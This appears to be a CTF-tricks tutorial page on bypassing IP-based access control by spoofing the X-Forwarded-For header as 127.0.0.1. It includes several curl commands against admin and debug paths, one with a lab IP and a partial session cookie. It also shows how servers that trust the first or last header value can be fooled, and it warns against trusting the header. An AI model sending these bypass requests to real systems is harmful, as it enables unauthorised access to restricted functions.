> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/bypass/access-control/trick-0102.md).

# X-Forwarded-For IP Bypass

***

Bypass IP access control checks by spoofing the `X-Forwarded-For` HTTP header to appear as `127.0.0.1`. If the application or server prioritizes or trusts the `X-Forwarded-For` header (especially the value `127.0.0.1`) for access control, it may treat the request as originating from localhost, bypassing restrictions meant for external IPs.

The general form of the `X-Forwarded-For` header is `X-Forwarded-For: <client>, <proxy1>, <proxy2>`. This header is easily spoofed by an attacker. By spoofing the `X-Forwarded-For` header to `127.0.0.1`, an attacker can trick the application into believing that the request originated from the localhost, thereby bypassing any IP-based access controls.

This can be done using `curl`:

```bash
curl 'http://<target_ip>:<target_port>/<restricted_path>' -H 'X-Forwarded-For: 127.0.0.1' <other_flags_like_-b_cookie>
```

For example, to bypass a check on `/debugresult`:

```bash
curl 'http://10.10.85.113:7777/debugresult' -H 'X-Forwarded-For: 127.0.0.1' -b 'session=.eJyrVkpJTSpNV7JS...[REDACTED]'
```

This technique is often surprisingly simple. Another example using `localhost:8000` and the `/admin` path:

```bash
curl -H "X-Forwarded-For: 127.0.0.1" http://localhost:8000/admin
```

Or targeting a specific domain's admin path:

```bash
curl -H "X-Forwarded-For: 127.0.0.1" http://target.com/admin
```

Some applications might process the `X-Forwarded-For` header by taking the first IP address listed. This is shown in this example Python code:

```python
# example from a web framework
real_ip = request.headers.getlist('X-Forwarded-For')[0]
```

However, some applications or frameworks might be configured to take the *last* value in the comma-separated list of IPs provided in the `X-Forwarded-For` header. In such cases, you might need to chain IP addresses, placing `127.0.0.1` at the end of the list. This is demonstrated by the following `curl` command:

```bash
curl -H "X-Forwarded-For: 1.2.3.4, 127.0.0.1" http://localhost:8000/admin
```

This approach is effective if the application processes the header like this Python example:

```python
# example that gets the last IP
real_ip = request.headers.getlist('X-Forwarded-For')[-1]
```

Understanding how the target application or server processes the `X-Forwarded-For` header – whether it trusts the first IP, the last IP, or specific values like `127.0.0.1` without sufficient validation – is key to successfully applying this bypass technique. The `X-Forwarded-For` HTTP header should not be used for security-sensitive operations, such as access control checks, as it can be easily spoofed. If the application uses the `X-Forwarded-For` header to determine the client's IP address and relies on this information for security-sensitive operations (like access control checks), an attacker can manipulate this header to impersonate any IP address, including `127.0.0.1` (localhost), to bypass IP-based access restrictions.
